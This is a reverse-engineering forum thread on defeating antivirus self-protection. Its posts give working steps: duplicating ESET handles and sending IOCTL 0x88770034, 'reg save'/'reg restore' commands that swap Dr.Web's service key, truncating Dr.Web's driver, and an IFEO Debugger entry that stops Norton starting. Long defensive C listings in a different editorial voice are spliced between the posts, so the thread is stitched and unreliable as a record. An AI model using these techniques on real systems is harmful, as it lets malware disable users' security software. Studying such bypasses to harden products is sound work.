A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #19815  by 0x16/7ton
 Wed Jun 26, 2013 2:05 am
Note about ESET SP bypassing, found in the leaked super elite CrapBerp source pack :ugeek:
So, NOD allows opening its own processes with this access:
After opening the process {ekrn.exe} they start enumerating its handles and duplicating them like here:
/* ekrn_handle_process: handle to ekrn.exe; handleInfo->Handles[dwIdx]: one entry of its handle table (typically from NtQuerySystemInformation(SystemHandleInformation)) */
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
All duplicated handles are passed to NtDeviceIoControlFile with IOCTL 0x88770034:
IO_STATUS_BLOCK StatusBlock;
UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};  /* same 4-byte buffer used as input and output */
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));
Okay, in the case when the duplicated hObject == \Device\Eamon,
NtDeviceIoControlFile calls fastIoDispatch->FastIoDeviceControl of the eamon.sys driver.
Seems like IOCTL 0x88770034 just disables AV SP.
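Decoding the IOCTL from the post, as an added example (this is not code from the post, from the leaked source or from ESET; it is a plain C decoder of the CTL_CODE bit layout from ntddk.h, and it runs anywhere). The only input is the constant 0x88770034 quoted above:

```c
/* Added example: split a Windows I/O control code into the CTL_CODE fields.
 * Layout of the 32-bit code (CTL_CODE macro in ntddk.h):
 *   bits 31..16  DeviceType   (values >= 0x8000 are vendor-defined)
 *   bits 15..14  RequiredAccess (FILE_ANY_ACCESS=0, FILE_READ_ACCESS=1,
 *                FILE_WRITE_ACCESS=2, both=3)
 *   bits 13..2   Function
 *   bits  1..0   Method (METHOD_BUFFERED=0, METHOD_IN_DIRECT=1,
 *                METHOD_OUT_DIRECT=2, METHOD_NEITHER=3)
 */
#include <stdint.h>
#include <stdio.h>

struct ioctl_fields {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
};

struct ioctl_fields ioctl_decode(uint32_t code) {
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      =  code        & 0x3;
    return f;
}

/* Same arithmetic as the CTL_CODE macro, so a decode can be round-tripped. */
uint32_t ioctl_encode(uint32_t device_type, uint32_t function,
                      uint32_t method, uint32_t access) {
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

const char *ioctl_method_name(uint32_t method) {
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 3];
}

const char *ioctl_access_name(uint32_t access) {
    static const char *names[] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                                   "FILE_WRITE_ACCESS",
                                   "FILE_READ_ACCESS|FILE_WRITE_ACCESS" };
    return names[access & 3];
}

/* True when the I/O manager enforces no FILE_READ_DATA/FILE_WRITE_DATA
 * requirement on the handle for this code, i.e. any handle to the device
 * reaches the driver and the driver alone decides who may call. */
int ioctl_needs_no_handle_access(uint32_t code) {
    return ioctl_decode(code).access == 0;
}

int main(void) {
    uint32_t code = 0x88770034u;          /* the IOCTL quoted in the post */
    struct ioctl_fields f = ioctl_decode(code);
    printf("0x%08X = CTL_CODE(0x%04X, 0x%03X, %s, %s)\n", code,
           f.device_type, f.function, ioctl_method_name(f.method),
           ioctl_access_name(f.access));
    return 0;
}
```

For 0x88770034 this gives CTL_CODE(0x8877, 0xD, METHOD_BUFFERED, FILE_ANY_ACCESS): a vendor device type, function 13, buffered I/O (which fits the 4-byte in/out buffer in the post) and no access requirement. With FILE_ANY_ACCESS the I/O manager does not look at the handle's granted access at all, so distinguishing ekrn.exe from a process that duplicated its handle is left entirely to the driver (for example by comparing the calling process against the service's process in the dispatch routine).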
 #19831  by Alex
 Wed Jun 26, 2013 4:23 pm
I was using the same method to exploit an old ESET vulnerability. So, ESET still doesn't protect access to its devices. I've never checked the functionality of the available IOCTLs, but this is not the first and not the last time such an easy scenario can be used to disarm AVs. Other AVs should also provide similar functionality, especially if their GUIs are not protected... An old presentation (ESET once again): Disabling Antivirus program(s).
 #22137  by 0x16/7ton
 Tue Feb 04, 2014 4:27 pm
I decided to make a video: "how I pwn KGBav with the new HIPS system" (Dr.Web 9.0) with 100% stealth, without any popup windows, security alerts, etc.

What I have:
- full admin rights
- all work in user mode
- AV settings are paranoid

Video of this tragedy:

I recommend wiping this crap from your PC if you still believe in super elite AV protection.
SpiDie will never die :lol:
 #22311  by KiFastCallEntry
 Wed Feb 26, 2014 2:10 pm
Nice work 0x16/7ton. Some lock tricks you discovered are not working anymore; I just get pissed off when I don't know how they protect against the tricks. Some AVs do not use any kind of FS filter driver, so I don't really get how they do it.
 #22405  by R00tKit
 Mon Mar 10, 2014 9:09 am

I found 2 new vulnerabilities in Dr.Web Self Protection (sharing one now):

1) remove reg keys:
reg save HKLM\SYSTEM\CurrentControlSet\serviceMPTRAP hive.hiv
reg restore HKLM\SYSTEM\CurrentControlSet\services\SpiderG3 hive.hiv
With this we can replace the Dr.Web key with the fake key, and Dr.Web will protect our service key :D
after replacing SpiderG3 with serviceMPTRAP :D
Other AVs not tested (Kaspersky is safe :)

edit: solution

Filter these in the RegistryCallback:
Vista SP2+: RegNtPreRestoreKey, RegNtPreSaveKey, RegNtPreReplaceKey,
and use the SSDT on Vista SP2 and below (32-bit).
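The decision such a RegistryCallback has to make, as an added example (not the poster's code and not Dr.Web's). It is written as portable C so it runs stand-alone: the enum mirrors the wdm.h REG_NOTIFY_CLASS names only, not their values; the key path is assumed to have been obtained already (in a real driver from the key object in the REG_xxx_KEY_INFORMATION argument, e.g. via CmCallbackGetKeyObjectIDEx); the driver registration itself (CmRegisterCallbackEx) is left out; and the protected service name SpiderG3 is the one from the post. The point it adds beyond the post is the path matching, because the kernel hands the callback the resolved name (ControlSet001 and friends, any letter case), not the HKLM\SYSTEM\CurrentControlSet\... string that reg.exe was given:

```c
/* Added example: decision logic for a self-protection registry callback that
 * also covers the hive-level save/restore/replace operations from the post.
 * Portable C; no kernel headers. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

enum reg_op {            /* stand-in for the REG_NOTIFY_CLASS names used here */
    OP_PRE_CREATE_KEY, OP_PRE_OPEN_KEY, OP_PRE_SET_VALUE, OP_PRE_DELETE_KEY,
    OP_PRE_DELETE_VALUE, OP_PRE_RENAME_KEY, OP_PRE_SET_INFORMATION,
    OP_PRE_SET_KEY_SECURITY, OP_PRE_QUERY_VALUE, OP_PRE_ENUMERATE_KEY,
    /* the three the post points at: whole-key hive operations */
    OP_PRE_RESTORE_KEY, OP_PRE_SAVE_KEY, OP_PRE_REPLACE_KEY
};

/* Service keys whose subtree is defended. Example name taken from the post;
 * a real driver would carry its own list. */
static const char *const protected_services[] = { "SpiderG3", NULL };

/* Case-insensitive prefix test; on success *consumed is the prefix length. */
static bool ieq_prefix(const char *s, const char *prefix, size_t *consumed)
{
    size_t i;
    for (i = 0; prefix[i]; i++)
        if (!s[i] || tolower((unsigned char)s[i]) != tolower((unsigned char)prefix[i]))
            return false;
    *consumed = i;
    return true;
}

/* Match \REGISTRY\MACHINE\SYSTEM\<ControlSet00N|CurrentControlSet>\Services\<svc>
 * followed by end-of-string or a backslash (so "SpiderG3x" is not "SpiderG3").
 * Matching only "CurrentControlSet" would miss the resolved ControlSet00N path. */
bool is_protected_service_key(const char *path)
{
    size_t n, k;
    const char *p = path;
    if (!ieq_prefix(p, "\\REGISTRY\\MACHINE\\SYSTEM\\", &n)) return false;
    p += n;
    if (ieq_prefix(p, "CurrentControlSet\\", &n)) {
        p += n;
    } else if (ieq_prefix(p, "ControlSet", &n)) {
        p += n;
        if (!isdigit((unsigned char)*p)) return false;
        while (isdigit((unsigned char)*p)) p++;
        if (*p++ != '\\') return false;
    } else {
        return false;
    }
    if (!ieq_prefix(p, "Services\\", &n)) return false;
    p += n;
    for (k = 0; protected_services[k]; k++)
        if (ieq_prefix(p, protected_services[k], &n) && (p[n] == '\0' || p[n] == '\\'))
            return true;
    return false;
}

/* True when the callback should fail the operation (STATUS_ACCESS_DENIED).
 * Reads and plain opens pass; everything that can modify or swap the key,
 * including restore/save/replace, is refused on a protected key. */
bool should_block(enum reg_op op, const char *key_path)
{
    switch (op) {
    case OP_PRE_QUERY_VALUE:
    case OP_PRE_ENUMERATE_KEY:
    case OP_PRE_OPEN_KEY:      /* the write that follows an open is caught on its own */
        return false;
    default:
        return is_protected_service_key(key_path);
    }
}
```

Two things worth keeping in mind when wiring this into a real driver: reg save/reg restore need SeBackupPrivilege/SeRestorePrivilege, so the attack in the post already assumes an administrator, which is exactly the caller self-protection is supposed to resist; and a restore targets the key as a whole, so the check has to run on the key object of the restore request, not on a value path.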
 #22410  by R00tKit
 Mon Mar 10, 2014 3:32 pm
The second method is to get the file ID of the Dr.Web sys file in the drivers path and open the file by file ID with OPEN_EXISTING + TRUNCATE_EXISTING.
After this the sys file is truncated; after reboot, no AV :D :mrgreen:

For Norton 2014 I also found this -> set an Image File Execution Options entry for NIS.exe -> after reboot no AV :D :mrgreen:

So simple. Need a POC?
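The check a responder would run for the NIS.exe trick above, as an added example (not the poster's POC and not Symantec's code): scan a .reg export of the Image File Execution Options tree for "Debugger" values. The input below is a constructed export, not a real system's; on a real host the text comes from `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` (UTF-16LE, so convert it to UTF-8 first, e.g. with iconv). The header match is a substring, so the Wow6432Node copy of the tree on 64-bit systems is picked up by the same code if exported alongside.

```c
/* Added example: find IFEO "Debugger" hijacks in a .reg export. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_HITS 16

struct ifeo_hit {
    char image[128];     /* e.g. NIS.exe, taken from the section header */
    char debugger[260];  /* the Debugger value with .reg escapes undone */
};

/* Case-insensitive substring search; *where receives the match position. */
static int ieq_contains(const char *hay, const char *needle, const char **where)
{
    size_t nl = strlen(needle);
    for (; *hay; hay++) {
        size_t i;
        for (i = 0; i < nl && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]); i++)
            ;
        if (i == nl) { *where = hay; return 1; }
    }
    return 0;
}

/* Copy a .reg quoted-string body (up to the closing quote) into dst,
 * undoing the \\ and \" escapes regedit writes. */
static void unescape_copy(char *dst, size_t cap, const char *src)
{
    size_t o = 0;
    for (; *src && *src != '"' && o + 1 < cap; src++) {
        if (*src == '\\' && (src[1] == '\\' || src[1] == '"')) src++;
        dst[o++] = *src;
    }
    dst[o] = '\0';
}

/* Walk reg_text line by line (CRLF or LF); returns the number of images
 * that carry a Debugger value and fills hits[]. */
int find_ifeo_debuggers(const char *reg_text, struct ifeo_hit *hits, int max_hits)
{
    char image[128] = "";
    int in_ifeo = 0, n = 0;
    const char *line = reg_text;

    while (*line && n < max_hits) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        char buf[1024];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (len && buf[len - 1] == '\r') buf[len - 1] = '\0';

        if (buf[0] == '[') {                        /* section header */
            const char *tag;
            in_ifeo = 0;
            if (ieq_contains(buf, "\\Image File Execution Options\\", &tag)) {
                const char *name = tag + strlen("\\Image File Execution Options\\");
                size_t l = strcspn(name, "]\\");    /* stop at ']' or a subkey */
                if (l >= sizeof image) l = sizeof image - 1;
                memcpy(image, name, l);
                image[l] = '\0';
                in_ifeo = (name[l] == ']');         /* only the per-image key itself */
            }
        } else if (in_ifeo && strncmp(buf, "\"Debugger\"=\"", 12) == 0) {
            snprintf(hits[n].image, sizeof hits[n].image, "%s", image);
            unescape_copy(hits[n].debugger, sizeof hits[n].debugger, buf + 12);
            n++;
        }
        if (!eol) break;
        line = eol + 1;
    }
    return n;
}

/* Constructed sample export (not from a real machine): one image has a
 * Debugger value, one has only an unrelated DWORD. */
const char *sample_reg =
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options]\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DllNXOptions]\r\n"
    "\"UseFilter\"=dword:00000000\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\NIS.exe]\r\n"
    "\"Debugger\"=\"C:\\\\does-not-exist\\\\hijack.exe\"\r\n";

static struct ifeo_hit sample_hits[MAX_HITS];
int scan_sample(void) { return find_ifeo_debuggers(sample_reg, sample_hits, MAX_HITS); }
const char *sample_hit_image(int i) { return sample_hits[i].image; }
const char *sample_hit_debugger(int i) { return sample_hits[i].debugger; }

int main(void) {
    int n = scan_sample(), i;
    for (i = 0; i < n; i++)
        printf("IFEO Debugger set for %s -> %s\n", sample_hit_image(i), sample_hit_debugger(i));
    return 0;
}
```

Any Debugger value on a security product's image name is worth treating as hostile until explained, whether or not the named binary exists: the loader substitutes the debugger for the image at process creation, so a path that does not exist is enough to keep the product from ever starting.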
 #27131  by cuttingedge
 Tue Nov 03, 2015 12:59 am
Could someone make a mirror of all the dead sendspace.com links in this thread from 2012? There were some great shares, but they did not upload them to kernelmode. Maybe someone has them archived?

Thank you!
 #27134  by EP_X0FF
 Tue Nov 03, 2015 5:04 am
Most of these links were video files. Which one exactly do you want?